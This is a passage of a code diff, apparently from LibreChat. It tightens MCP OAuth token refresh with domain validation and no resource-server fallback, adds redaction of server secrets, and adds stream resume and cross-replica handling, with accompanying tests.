'mcp_oauth_state'; /** @@ -758,9 +821,16 @@ export class MCPOAuthHandler { */ static async refreshOAuthTokens( refreshToken: string, - metadata: { serverName: string; serverUrl?: string; clientInfo?: OAuthClientInformation }, + metadata: { + serverName: string; + serverUrl?: string; + clientInfo?: OAuthClientInformation; + storedTokenEndpoint?: string; + storedAuthMethods?: string[]; + }, oauthHeaders: Record, config?: MCPOptions['oauth'], + allowedDomains?: string[] | null, ): Promise { logger.debug(`[MCPOAuth] Refreshing tokens for ${metadata.serverName}`); @@ -783,10 +853,10 @@ export class MCPOAuthHandler { scope: metadata.clientInfo.scope, }); - /** Use the stored client information and metadata to determine the token URL */ let tokenUrl: string; let authMethods: string[] | undefined; if (config?.token_url) { + await this.validateOAuthUrl(config.token_url, 'token_url', allowedDomains); tokenUrl = config.token_url; authMethods = config.token_endpoint_auth_methods_supported; } else if (!metadata.serverUrl) { @@ -798,21 +868,25 @@ export class MCPOAuthHandler { const oauthMetadata = await this.discoverWithOriginFallback(serverUrl, fetchFn); if (!oauthMetadata) { - /** - * No metadata discovered - use fallback /token endpoint. - * This mirrors the MCP SDK's behavior for legacy servers without .well-known endpoints. - */ - logger.warn( - `[MCPOAuth] No OAuth metadata discovered for token refresh, using fallback /token endpoint`, - ); - tokenUrl = new URL('/token', metadata.serverUrl).toString(); - authMethods = ['client_secret_basic', 'client_secret_post', 'none']; + if (metadata.storedTokenEndpoint) { + tokenUrl = metadata.storedTokenEndpoint; + authMethods = metadata.storedAuthMethods; + } else { + /** + * Do NOT fall back to `new URL('/token', metadata.serverUrl)`. + * metadata.serverUrl is the MCP resource server, which may differ from the + * authorization server. Sending refresh tokens there leaks them to the + * resource server operator when .well-known discovery is absent. + */ + throw new Error('No OAuth metadata discovered for token refresh'); + } } else if (!oauthMetadata.token_endpoint) { throw new Error('No token endpoint found in OAuth metadata'); } else { tokenUrl = oauthMetadata.token_endpoint; authMethods = oauthMetadata.token_endpoint_auth_methods_supported; } + await this.validateOAuthUrl(tokenUrl, 'token_url', allowedDomains); } const body = new URLSearchParams({ @@ -865,8 +939,8 @@ export class MCPOAuthHandler { } logger.debug(`[MCPOAuth] Refresh request to: ${sanitizeUrlForLogging(tokenUrl)}`, { - body: body.toString(), - headers, + grant_type: 'refresh_token', + has_auth_header: !!headers['Authorization'], }); const response = await fetch(tokenUrl, { @@ -886,10 +960,10 @@ export class MCPOAuthHandler { return this.processRefreshResponse(tokens, metadata.serverName, 'stored client info'); } - // Fallback: If we have pre-configured OAuth settings, use them if (config?.token_url && config?.client_id) { logger.debug(`[MCPOAuth] Using pre-configured OAuth settings for token refresh`); + await this.validateOAuthUrl(config.token_url, 'token_url', allowedDomains); const tokenUrl = new URL(config.token_url); const body = new URLSearchParams({ @@ -975,18 +1049,20 @@ export class MCPOAuthHandler { const oauthMetadata = await this.discoverWithOriginFallback(serverUrl, fetchFn); let tokenUrl: URL; - if (!oauthMetadata?.token_endpoint) { - /** - * No metadata or token_endpoint discovered - use fallback /token endpoint. - * This mirrors the MCP SDK's behavior for legacy servers without .well-known endpoints. - */ - logger.warn( - `[MCPOAuth] No OAuth metadata or token endpoint found, using fallback /token endpoint`, - ); - tokenUrl = new URL('/token', metadata.serverUrl); + if (!oauthMetadata) { + if (metadata.storedTokenEndpoint) { + tokenUrl = new URL(metadata.storedTokenEndpoint); + } else { + // Same rationale as the stored-clientInfo branch above: never fall back + // to metadata.serverUrl which is the MCP resource server, not the auth server. + throw new Error('No OAuth metadata discovered for token refresh'); + } + } else if (!oauthMetadata.token_endpoint) { + throw new Error('No token endpoint found in OAuth metadata'); } else { tokenUrl = new URL(oauthMetadata.token_endpoint); } + await this.validateOAuthUrl(tokenUrl.href, 'token_url', allowedDomains); const body = new URLSearchParams({ grant_type: 'refresh_token', @@ -1035,12 +1111,13 @@ export class MCPOAuthHandler { revocationEndpointAuthMethodsSupported?: string[]; }, oauthHeaders: Record = {}, + allowedDomains?: string[] | null, ): Promise { - // build the revoke URL, falling back to the server URL + /revoke if no revocation endpoint is provided const revokeUrl: URL = metadata.revocationEndpoint != null ? new URL(metadata.revocationEndpoint) : new URL('/revoke', metadata.serverUrl); + await this.validateOAuthUrl(revokeUrl.href, 'revocation_endpoint', allowedDomains); const authMethods = metadata.revocationEndpointAuthMethodsSupported ?? ['client_secret_basic']; const authMethod = resolveTokenEndpointAuthMethod({ tokenAuthMethods: authMethods }); diff --git a/packages/api/src/mcp/oauth/tokens.ts b/packages/api/src/mcp/oauth/tokens.ts index 7b1d189347..1e31a64511 100644 --- a/packages/api/src/mcp/oauth/tokens.ts +++ b/packages/api/src/mcp/oauth/tokens.ts @@ -41,6 +41,8 @@ interface GetTokensParams { serverName: string; identifier: string; clientInfo?: OAuthClientInformation; + storedTokenEndpoint?: string; + storedAuthMethods?: string[]; }, ) => Promise; createToken?: TokenMethods['createToken']; @@ -83,46 +85,40 @@ export class MCPTokenStorage { `${logPrefix} Token expires_in: ${'expires_in' in tokens ? tokens.expires_in : 'N/A'}, expires_at: ${'expires_at' in tokens ? tokens.expires_at : 'N/A'}`, ); - // Handle both expires_in and expires_at formats + const defaultTTL = 365 * 24 * 60 * 60; + let accessTokenExpiry: Date; + let expiresInSeconds: number; if ('expires_at' in tokens && tokens.expires_at) { /** MCPOAuthTokens format - already has calculated expiry */ logger.debug(`${logPrefix} Using expires_at: ${tokens.expires_at}`); accessTokenExpiry = new Date(tokens.expires_at); + expiresInSeconds = Math.floor((accessTokenExpiry.getTime() - Date.now()) / 1000); } else if (tokens.expires_in) { - /** Standard OAuthTokens format - calculate expiry */ + /** Standard OAuthTokens format - use expires_in directly to avoid lossy Date round-trip */ logger.debug(`${logPrefix} Using expires_in: ${tokens.expires_in}`); + expiresInSeconds = tokens.expires_in; accessTokenExpiry = new Date(Date.now() + tokens.expires_in * 1000); } else { - /** No expiry provided - default to 1 year */ logger.debug(`${logPrefix} No expiry provided, using default`); - accessTokenExpiry = new Date(Date.now() + 365 * 24 * 60 * 60 * 1000); + expiresInSeconds = defaultTTL; + accessTokenExpiry = new Date(Date.now() + defaultTTL * 1000); } logger.debug(`${logPrefix} Calculated expiry date: ${accessTokenExpiry.toISOString()}`); - logger.debug( - `${logPrefix} Date object: ${JSON.stringify({ - time: accessTokenExpiry.getTime(), - valid: !isNaN(accessTokenExpiry.getTime()), - iso: accessTokenExpiry.toISOString(), - })}`, - ); - // Ensure the date is valid before passing to createToken if (isNaN(accessTokenExpiry.getTime())) { logger.error(`${logPrefix} Invalid expiry date calculated, using default`); - accessTokenExpiry = new Date(Date.now() + 365 * 24 * 60 * 60 * 1000); + accessTokenExpiry = new Date(Date.now() + defaultTTL * 1000); + expiresInSeconds = defaultTTL; } - // Calculate expiresIn (seconds from now) - const expiresIn = Math.floor((accessTokenExpiry.getTime() - Date.now()) / 1000); - const accessTokenData = { userId, type: 'mcp_oauth', identifier, token: encryptedAccessToken, - expiresIn: expiresIn > 0 ? expiresIn : 365 * 24 * 60 * 60, // Default to 1 year if negative + expiresIn: expiresInSeconds > 0 ? expiresInSeconds : defaultTTL, }; // Check if token already exists and update if it does @@ -312,9 +308,10 @@ export class MCPTokenStorage { logger.info(`${logPrefix} Attempting to refresh token`); const decryptedRefreshToken = await decryptV2(refreshTokenData.token); - /** Client information if available */ let clientInfo; let clientInfoData; + let storedTokenEndpoint: string | undefined; + let storedAuthMethods: string[] | undefined; try { clientInfoData = await findToken({ userId, @@ -328,6 +325,19 @@ export class MCPTokenStorage { client_id: clientInfo.client_id, has_client_secret: !!clientInfo.client_secret, }); + + if (clientInfoData.metadata) { + const raw = + clientInfoData.metadata instanceof Map + ? Object.fromEntries(clientInfoData.metadata) + : (clientInfoData.metadata as Record); + if (typeof raw.token_endpoint === 'string') { + storedTokenEndpoint = raw.token_endpoint; + } + if (Array.isArray(raw.token_endpoint_auth_methods_supported)) { + storedAuthMethods = raw.token_endpoint_auth_methods_supported as string[]; + } + } } } catch { logger.debug(`${logPrefix} No client info found`); @@ -338,6 +348,8 @@ export class MCPTokenStorage { serverName, identifier, clientInfo, + storedTokenEndpoint, + storedAuthMethods, }; const newTokens = await refreshTokens(decryptedRefreshToken, metadata); diff --git a/packages/api/src/mcp/registry/MCPServerInspector.ts b/packages/api/src/mcp/registry/MCPServerInspector.ts index eea52bbf2e..7f31211680 100644 --- a/packages/api/src/mcp/registry/MCPServerInspector.ts +++ b/packages/api/src/mcp/registry/MCPServerInspector.ts @@ -6,6 +6,7 @@ import { isMCPDomainAllowed, extractMCPServerDomain } from '~/auth/domain'; import { MCPConnectionFactory } from '~/mcp/MCPConnectionFactory'; import { MCPDomainNotAllowedError } from '~/mcp/errors'; import { detectOAuthRequirement } from '~/mcp/oauth'; +import { hasCustomUserVars } from '~/mcp/utils'; import { isEnabled } from '~/utils'; /** @@ -19,6 +20,7 @@ export class MCPServerInspector { private readonly config: t.ParsedServerConfig, private connection: MCPConnection | undefined, private readonly useSSRFProtection: boolean = false, + private readonly allowedDomains?: string[] | null, ) {} /** @@ -45,7 +47,13 @@ export class MCPServerInspector { const useSSRFProtection = !Array.isArray(allowedDomains) || allowedDomains.length === 0; const start = Date.now(); - const inspector = new MCPServerInspector(serverName, rawConfig, connection, useSSRFProtection); + const inspector = new MCPServerInspector( + serverName, + rawConfig, + connection, + useSSRFProtection, + allowedDomains, + ); await inspector.inspectServer(); inspector.config.initDuration = Date.now() - start; return inspector.config; @@ -54,7 +62,11 @@ export class MCPServerInspector { private async inspectServer(): Promise { await this.detectOAuth(); - if (this.config.startup !== false && !this.config.requiresOAuth) { + if ( + this.config.startup !== false && + !this.config.requiresOAuth && + !hasCustomUserVars(this.config) + ) { let tempConnection = false; if (!this.connection) { tempConnection = true; @@ -63,6 +75,7 @@ export class MCPServerInspector { serverName: this.serverName, dbSourced: !!this.config.dbId, useSSRFProtection: this.useSSRFProtection, + allowedDomains: this.allowedDomains, }); } diff --git a/packages/api/src/mcp/registry/__tests__/MCPServerInspector.test.ts b/packages/api/src/mcp/registry/__tests__/MCPServerInspector.test.ts index b79f2d044a..f0ab75c9b4 100644 --- a/packages/api/src/mcp/registry/__tests__/MCPServerInspector.test.ts +++ b/packages/api/src/mcp/registry/__tests__/MCPServerInspector.test.ts @@ -100,6 +100,54 @@ describe('MCPServerInspector', () => { }); }); + it('should skip capabilities fetch when customUserVars is defined', async () => { + const rawConfig: t.MCPOptions = { + type: 'stdio', + command: 'npx', + args: ['-y', '@test/mcp-stdio-server'], + env: { API_KEY: '{{MY_KEY}}' }, + customUserVars: { + MY_KEY: { title: 'API Key', description: 'Your API key' }, + }, + }; + + const result = await MCPServerInspector.inspect('test_server', rawConfig, mockConnection); + + expect(result).toEqual({ + type: 'stdio', + command: 'npx', + args: ['-y', '@test/mcp-stdio-server'], + env: { API_KEY: '{{MY_KEY}}' }, + customUserVars: { + MY_KEY: { title: 'API Key', description: 'Your API key' }, + }, + requiresOAuth: false, + initDuration: expect.any(Number), + }); + + expect(MCPConnectionFactory.create).not.toHaveBeenCalled(); + expect(mockConnection.disconnect).not.toHaveBeenCalled(); + }); + + it('should NOT create a temp connection when customUserVars is defined and no connection is provided', async () => { + const rawConfig: t.MCPOptions = { + type: 'stdio', + command: 'npx', + args: ['-y', '@test/mcp-stdio-server'], + env: { API_KEY: '{{MY_KEY}}' }, + customUserVars: { + MY_KEY: { title: 'API Key', description: 'Your API key' }, + }, + }; + + const result = await MCPServerInspector.inspect('test_server', rawConfig); + + expect(MCPConnectionFactory.create).not.toHaveBeenCalled(); + expect(result.requiresOAuth).toBe(false); + expect(result.capabilities).toBeUndefined(); + expect(result.toolFunctions).toBeUndefined(); + }); + it('should keep custom serverInstructions string and not fetch from server', async () => { const rawConfig: t.MCPOptions = { type: 'stdio', diff --git a/packages/api/src/mcp/registry/__tests__/ServerConfigsDB.test.ts b/packages/api/src/mcp/registry/__tests__/ServerConfigsDB.test.ts index 1c755ae0f0..38ed51cd99 100644 --- a/packages/api/src/mcp/registry/__tests__/ServerConfigsDB.test.ts +++ b/packages/api/src/mcp/registry/__tests__/ServerConfigsDB.test.ts @@ -1456,4 +1456,102 @@ describe('ServerConfigsDB', () => { expect(retrieved?.apiKey?.key).toBeUndefined(); }); }); + + describe('DB layer returns decrypted secrets (redaction is at controller layer)', () => { + it('should return decrypted apiKey.key to VIEW-only user via get()', async () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + title: 'Secret API Key Server', + apiKey: { + source: 'admin', + authorization_type: 'bearer', + key: 'admin-secret-api-key', + }, + }; + const created = await serverConfigsDB.add('temp-name', config, userId); + + const role = await mongoose.models.AccessRole.findOne({ + accessRoleId: AccessRoleIds.MCPSERVER_VIEWER, + }); + await mongoose.models.AclEntry.create({ + principalType: PrincipalType.USER, + principalModel: PrincipalModel.USER, + principalId: new mongoose.Types.ObjectId(userId2), + resourceType: ResourceType.MCPSERVER, + resourceId: new mongoose.Types.ObjectId(created.config.dbId!), + permBits: PermissionBits.VIEW, + roleId: role!._id, + grantedBy: new mongoose.Types.ObjectId(userId), + }); + + const result = await serverConfigsDB.get(created.serverName, userId2); + expect(result).toBeDefined(); + expect(result?.apiKey?.key).toBe('admin-secret-api-key'); + }); + + it('should return decrypted oauth.client_secret to VIEW-only user via get()', async () => { + const config = createSSEConfig('Secret OAuth Server', 'Test', { + client_id: 'my-client-id', + client_secret: 'admin-oauth-secret', + }); + const created = await serverConfigsDB.add('temp-name', config, userId); + + const role = await mongoose.models.AccessRole.findOne({ + accessRoleId: AccessRoleIds.MCPSERVER_VIEWER, + }); + await mongoose.models.AclEntry.create({ + principalType: PrincipalType.USER, + principalModel: PrincipalModel.USER, + principalId: new mongoose.Types.ObjectId(userId2), + resourceType: ResourceType.MCPSERVER, + resourceId: new mongoose.Types.ObjectId(created.config.dbId!), + permBits: PermissionBits.VIEW, + roleId: role!._id, + grantedBy: new mongoose.Types.ObjectId(userId), + }); + + const result = await serverConfigsDB.get(created.serverName, userId2); + expect(result).toBeDefined(); + expect(result?.oauth?.client_secret).toBe('admin-oauth-secret'); + }); + + it('should return decrypted secrets to VIEW-only user via getAll()', async () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + title: 'Shared Secret Server', + apiKey: { + source: 'admin', + authorization_type: 'bearer', + key: 'shared-api-key', + }, + oauth: { + client_id: 'shared-client', + client_secret: 'shared-oauth-secret', + }, + }; + const created = await serverConfigsDB.add('temp-name', config, userId); + + const role = await mongoose.models.AccessRole.findOne({ + accessRoleId: AccessRoleIds.MCPSERVER_VIEWER, + }); + await mongoose.models.AclEntry.create({ + principalType: PrincipalType.USER, + principalModel: PrincipalModel.USER, + principalId: new mongoose.Types.ObjectId(userId2), + resourceType: ResourceType.MCPSERVER, + resourceId: new mongoose.Types.ObjectId(created.config.dbId!), + permBits: PermissionBits.VIEW, + roleId: role!._id, + grantedBy: new mongoose.Types.ObjectId(userId), + }); + + const result = await serverConfigsDB.getAll(userId2); + const serverConfig = result[created.serverName]; + expect(serverConfig).toBeDefined(); + expect(serverConfig?.apiKey?.key).toBe('shared-api-key'); + expect(serverConfig?.oauth?.client_secret).toBe('shared-oauth-secret'); + }); + }); }); diff --git a/packages/api/src/mcp/types/index.ts b/packages/api/src/mcp/types/index.ts index bbdabb4428..0af10c7399 100644 --- a/packages/api/src/mcp/types/index.ts +++ b/packages/api/src/mcp/types/index.ts @@ -169,6 +169,7 @@ export interface BasicConnectionOptions { serverName: string; serverConfig: MCPOptions; useSSRFProtection?: boolean; + allowedDomains?: string[] | null; /** When true, only resolve customUserVars in processMCPEnv (for DB-stored servers) */ dbSourced?: boolean; } diff --git a/packages/api/src/mcp/utils.ts b/packages/api/src/mcp/utils.ts index fddebb9db3..ff367725fc 100644 --- a/packages/api/src/mcp/utils.ts +++ b/packages/api/src/mcp/utils.ts @@ -1,6 +1,71 @@ import { Constants } from 'librechat-data-provider'; +import type { ParsedServerConfig } from '~/mcp/types'; export const mcpToolPattern = new RegExp(`^.+${Constants.mcp_delimiter}.+$`); + +/** Checks that `customUserVars` is present AND non-empty (guards against truthy `{}`) */ +export function hasCustomUserVars(config: Pick): boolean { + return !!config.customUserVars && Object.keys(config.customUserVars).length > 0; +} + +/** + * Allowlist-based sanitization for API responses. Only explicitly listed fields are included; + * new fields added to ParsedServerConfig are excluded by default until allowlisted here. + * + * URLs are returned as-is: DB-stored configs reject ${VAR} patterns at validation time + * (MCPServerUserInputSchema), and YAML configs are admin-managed. Env variable resolution + * is handled at the schema/input boundary, not the output boundary. + */ +export function redactServerSecrets(config: ParsedServerConfig): Partial { + const safe: Partial = { + type: config.type, + url: config.url, + title: config.title, + description: config.description, + iconPath: config.iconPath, + chatMenu: config.chatMenu, + requiresOAuth: config.requiresOAuth, + capabilities: config.capabilities, + tools: config.tools, + toolFunctions: config.toolFunctions, + initDuration: config.initDuration, + updatedAt: config.updatedAt, + dbId: config.dbId, + consumeOnly: config.consumeOnly, + inspectionFailed: config.inspectionFailed, + customUserVars: config.customUserVars, + serverInstructions: config.serverInstructions, + }; + + if (config.apiKey) { + safe.apiKey = { + source: config.apiKey.source, + authorization_type: config.apiKey.authorization_type, + ...(config.apiKey.custom_header && { custom_header: config.apiKey.custom_header }), + }; + } + + if (config.oauth) { + const { client_secret: _secret, ...safeOAuth } = config.oauth; + safe.oauth = safeOAuth; + } + + return Object.fromEntries( + Object.entries(safe).filter(([, v]) => v !== undefined), + ) as Partial; +} + +/** Applies allowlist-based sanitization to a map of server configs. */ +export function redactAllServerSecrets( + configs: Record, +): Record> { + const result: Record> = {}; + for (const [key, config] of Object.entries(configs)) { + result[key] = redactServerSecrets(config); + } + return result; +} + /** * Normalizes a server name to match the pattern ^[a-zA-Z0-9_.-]+$ * This is required for Azure OpenAI models with Tool Calling diff --git a/packages/api/src/stream/GenerationJobManager.ts b/packages/api/src/stream/GenerationJobManager.ts index cd5ff04eb0..3e04ab734b 100644 --- a/packages/api/src/stream/GenerationJobManager.ts +++ b/packages/api/src/stream/GenerationJobManager.ts @@ -656,7 +656,7 @@ class GenerationJobManagerClass { aborted: true, // Flag for early abort - no messages saved, frontend should go to new chat earlyAbort: isEarlyAbort, - } as unknown as t.ServerSentEvent; + } satisfies t.FinalEvent as t.ServerSentEvent; if (runtime) { runtime.finalEvent = abortFinalEvent; @@ -707,6 +707,10 @@ class GenerationJobManagerClass { * @param onChunk - Handler for chunk events (streamed tokens, run steps, etc.) * @param onDone - Handler for completion event (includes final message) * @param onError - Handler for error events + * @param options - Subscription configuration + * @param options.skipBufferReplay - When true, skips replaying the earlyEventBuffer. + * Use this when a sync event was already sent (resume), since the sync's + * aggregatedContent already includes all buffered events. * @returns Subscription object with unsubscribe function, or null if job not found */ async subscribe( @@ -714,6 +718,7 @@ class GenerationJobManagerClass { onChunk: t.ChunkHandler, onDone?: t.DoneHandler, onError?: t.ErrorHandler, + options?: t.SubscribeOptions, ): Promise<{ unsubscribe: t.UnsubscribeFn } | null> { // Use lazy initialization to support cross-replica subscriptions const runtime = await this.getOrCreateRuntimeState(streamId); @@ -763,13 +768,40 @@ class GenerationJobManagerClass { runtime.hasSubscriber = true; if (runtime.earlyEventBuffer.length > 0) { - logger.debug( - `[GenerationJobManager] Replaying ${runtime.earlyEventBuffer.length} buffered events for ${streamId}`, - ); - for (const bufferedEvent of runtime.earlyEventBuffer) { - onChunk(bufferedEvent); + if (options?.skipBufferReplay) { + logger.debug( + `[GenerationJobManager] Skipping ${runtime.earlyEventBuffer.length} buffered events for ${streamId} (skipBufferReplay)`, + ); + } else { + logger.debug( + `[GenerationJobManager] Replaying ${runtime.earlyEventBuffer.length} buffered events for ${streamId}`, + ); + for (const bufferedEvent of runtime.earlyEventBuffer) { + onChunk(bufferedEvent); + } } runtime.earlyEventBuffer = []; + } else if (this._isRedis && !options?.skipBufferReplay && jobData?.userMessage) { + /** + * Cross-replica fallback: the created event was buffered on the generating + * instance and published via Redis pub/sub before this subscriber was active. + * Reconstruct from persisted metadata. Only fields stored by trackUserMessage() + * are available (messageId, parentMessageId, conversationId, text); + * sender/isCreatedByUser are invariant for user messages and added back here. + */ + logger.debug( + `[GenerationJobManager] Cross-replica subscribe: emitting created event from metadata for ${streamId}`, + ); + const createdEvent: t.CreatedEvent = { + created: true, + message: { + ...jobData.userMessage, + sender: 'User', + isCreatedByUser: true, + }, + streamId, + }; + onChunk(createdEvent); } this.eventTransport.syncReorderBuffer?.(streamId); @@ -785,6 +817,52 @@ class GenerationJobManagerClass { return subscription; } + /** + * Atomic resume + subscribe: snapshots resume state and drains the early event buffer + * in one synchronous step, then subscribes with skipBufferReplay. + * + * Closes the timing gap between separate `getResumeState()` and `subscribe()` calls + * where events could arrive in earlyEventBuffer after the snapshot but before subscribe + * clears the buffer. + * + * In-memory mode: drained buffer events are returned as `pendingEvents` since + * they exist nowhere else. The caller must deliver them after the sync payload. + * Redis mode: `pendingEvents` is empty — chunks are persisted via appendChunk + * and will appear in aggregatedContent on the next resume. + */ + async subscribeWithResume( + streamId: string, + onChunk: t.ChunkHandler, + onDone?: t.DoneHandler, + onError?: t.ErrorHandler, + ): Promise { + const bufferLengthAtSnapshot = !this._isRedis + ? (this.runtimeState.get(streamId)?.earlyEventBuffer.length ?? 0) + : 0; + + const resumeState = await this.getResumeState(streamId); + + let pendingEvents: t.ServerSentEvent[] = []; + if (!this._isRedis) { + const runtime = this.runtimeState.get(streamId); + if (runtime) { + pendingEvents = runtime.earlyEventBuffer.slice(bufferLengthAtSnapshot); + runtime.earlyEventBuffer = []; + if (pendingEvents.length > 0) { + logger.debug( + `[GenerationJobManager] Captured ${pendingEvents.length} gap events for ${streamId}`, + ); + } + } + } + + const subscription = await this.subscribe(streamId, onChunk, onDone, onError, { + skipBufferReplay: true, + }); + + return { subscription, resumeState, pendingEvents }; + } + /** * Emit a chunk event to all subscribers. * Uses runtime state check for performance (avoids async job store lookup per token). @@ -801,8 +879,7 @@ class GenerationJobManagerClass { return; } - // Track user message from created event - this.trackUserMessage(streamId, event); + await this.trackUserMessage(streamId, event); // For Redis mode, persist chunk for later reconstruction (fire-and-forget for resumability) if (this._isRedis) { @@ -886,29 +963,31 @@ class GenerationJobManagerClass { } /** - * Track user message from created event. + * Persist user message metadata from the created event. + * Awaited in emitChunk so the HSET commits before the PUBLISH, + * guaranteeing any cross-replica getJob() after the pub/sub window + * finds userMessage in Redis. */ - private trackUserMessage(streamId: string, event: t.ServerSentEvent): void { - const data = event as Record; - if (!data.created || !data.message) { + private async trackUserMessage(streamId: string, event: t.ServerSentEvent): Promise { + if (!('created' in event)) { return; } - const message = data.message as Record; + const { message } = event; const updates: Partial = { userMessage: { - messageId: message.messageId as string, - parentMessageId: message.parentMessageId as string | undefined, - conversationId: message.conversationId as string | undefined, - text: message.text as string | undefined, + messageId: message.messageId, + parentMessageId: message.parentMessageId, + conversationId: message.conversationId, + text: message.text, }, }; if (message.conversationId) { - updates.conversationId = message.conversationId as string; + updates.conversationId = message.conversationId; } - this.jobStore.updateJob(streamId, updates); + await this.jobStore.updateJob(streamId, updates); } /** diff --git a/packages/api/src/stream/__tests__/GenerationJobManager.stream_integration.spec.ts b/packages/api/src/stream/__tests__/GenerationJobManager.stream_integration.spec.ts index 59fe32e4e5..3e85ace56d 100644 --- a/packages/api/src/stream/__tests__/GenerationJobManager.stream_integration.spec.ts +++ b/packages/api/src/stream/__tests__/GenerationJobManager.stream_integration.spec.ts @@ -1,5 +1,6 @@ +/* eslint jest/no-standalone-expect: ["error", { "additionalTestBlockFunctions": ["testRedis"] }] */ import type { Redis, Cluster } from 'ioredis'; -import type { ServerSentEvent } from '~/types/events'; +import type { ServerSentEvent, StreamEvent, CreatedEvent } from '~/types'; import { InMemoryEventTransport } from '~/stream/implementations/InMemoryEventTransport'; import { RedisEventTransport } from '~/stream/implementations/RedisEventTransport'; import { InMemoryJobStore } from '~/stream/implementations/InMemoryJobStore'; @@ -27,6 +28,9 @@ describe('GenerationJobManager Integration Tests', () => { let dynamicKeyvClient: unknown = null; let dynamicKeyvReady: Promise | null = null; const testPrefix = 'JobManager-Integration-Test'; + const redisConfigured = process.env.USE_REDIS === 'true'; + const describeRedis = redisConfigured ? describe : describe.skip; + const testRedis = redisConfigured ? test : test.skip; beforeAll(async () => { originalEnv = { ...process.env }; @@ -82,6 +86,68 @@ describe('GenerationJobManager Integration Tests', () => { process.env = originalEnv; }); + function createInMemoryManager(): GenerationJobManagerClass { + const manager = new GenerationJobManagerClass(); + manager.configure({ + jobStore: new InMemoryJobStore({ ttlAfterComplete: 60000 }), + eventTransport: new InMemoryEventTransport(), + isRedis: false, + }); + manager.initialize(); + return manager; + } + + function createRedisManager(): GenerationJobManagerClass { + const manager = new GenerationJobManagerClass(); + manager.configure( + createStreamServices({ + useRedis: true, + redisClient: ioredisClient!, + }), + ); + manager.initialize(); + return manager; + } + + async function setupDisconnectedStream( + manager: GenerationJobManagerClass, + streamId: string, + delay: number, + ): Promise { + const firstEvents: ServerSentEvent[] = []; + const sub = await manager.subscribe(streamId, (event) => firstEvents.push(event)); + + await new Promise((resolve) => setTimeout(resolve, delay)); + + await manager.emitChunk(streamId, { + event: 'on_run_step', + data: { id: 'step-1', runId: 'run-1', index: 0, stepDetails: { type: 'message_creation' } }, + }); + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { id: 'step-1', delta: { content: { type: 'text', text: 'Hello' } } }, + }); + + await new Promise((resolve) => setTimeout(resolve, delay)); + expect(firstEvents.length).toBe(2); + + sub?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, delay)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { id: 'step-1', delta: { content: { type: 'text', text: ' world' } } }, + }); + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { id: 'step-1', delta: { content: { type: 'text', text: '!' } } }, + }); + + await new Promise((resolve) => setTimeout(resolve, delay)); + + return firstEvents; + } + describe('In-Memory Mode', () => { test('should create and manage jobs', async () => { // Configure with in-memory @@ -171,13 +237,8 @@ describe('GenerationJobManager Integration Tests', () => { }); }); - describe('Redis Mode', () => { + describeRedis('Redis Mode', () => { test('should create and manage jobs via Redis', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - // Create Redis services const services = createStreamServices({ useRedis: true, @@ -209,11 +270,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should persist chunks for cross-instance resume', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const services = createStreamServices({ useRedis: true, redisClient: ioredisClient, @@ -264,11 +320,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should handle abort and return content', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const services = createStreamServices({ useRedis: true, redisClient: ioredisClient, @@ -374,7 +425,7 @@ describe('GenerationJobManager Integration Tests', () => { }); }); - describe('Cross-Replica Support (Redis)', () => { + describeRedis('Cross-Replica Support (Redis)', () => { /** * Problem: In k8s with Redis and multiple replicas, when a user sends a message: * 1. POST /api/agents/chat hits Replica A, creates job @@ -387,15 +438,10 @@ describe('GenerationJobManager Integration Tests', () => { * when the job exists in Redis but not in local memory. */ test('should NOT return 404 when stream endpoint hits different replica than job creator', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - // === REPLICA A: Creates the job === // Simulate Replica A creating the job directly in Redis // (In real scenario, this happens via GenerationJobManager.createJob on Replica A) - const replicaAJobStore = new RedisJobStore(ioredisClient); + const replicaAJobStore = new RedisJobStore(ioredisClient!); await replicaAJobStore.initialize(); const streamId = `cross-replica-404-test-${Date.now()}`; @@ -452,13 +498,8 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should lazily create runtime state for jobs created on other replicas', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - // Instance 1: Create the job directly in Redis (simulating another replica) - const jobStore = new RedisJobStore(ioredisClient); + const jobStore = new RedisJobStore(ioredisClient!); await jobStore.initialize(); const streamId = `cross-replica-${Date.now()}`; @@ -500,11 +541,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should persist syncSent to Redis for cross-replica consistency', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const services = createStreamServices({ useRedis: true, redisClient: ioredisClient, @@ -539,11 +575,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should persist finalEvent to Redis for cross-replica access', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const services = createStreamServices({ useRedis: true, redisClient: ioredisClient, @@ -581,11 +612,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should emit cross-replica abort signal via Redis pub/sub', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const services = createStreamServices({ useRedis: true, redisClient: ioredisClient, @@ -620,16 +646,11 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should handle abort for lazily-initialized cross-replica jobs', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - // This test validates that jobs created on Replica A and lazily-initialized // on Replica B can still receive and handle abort signals. // === Replica A: Create job directly in Redis === - const replicaAJobStore = new RedisJobStore(ioredisClient); + const replicaAJobStore = new RedisJobStore(ioredisClient!); await replicaAJobStore.initialize(); const streamId = `lazy-abort-${Date.now()}`; @@ -675,11 +696,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should abort generation when abort signal received from another replica', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - // This test simulates: // 1. Replica A creates a job and starts generation // 2. Replica B receives abort request and emits abort signal @@ -729,13 +745,8 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should handle wasSyncSent for cross-replica scenarios', async 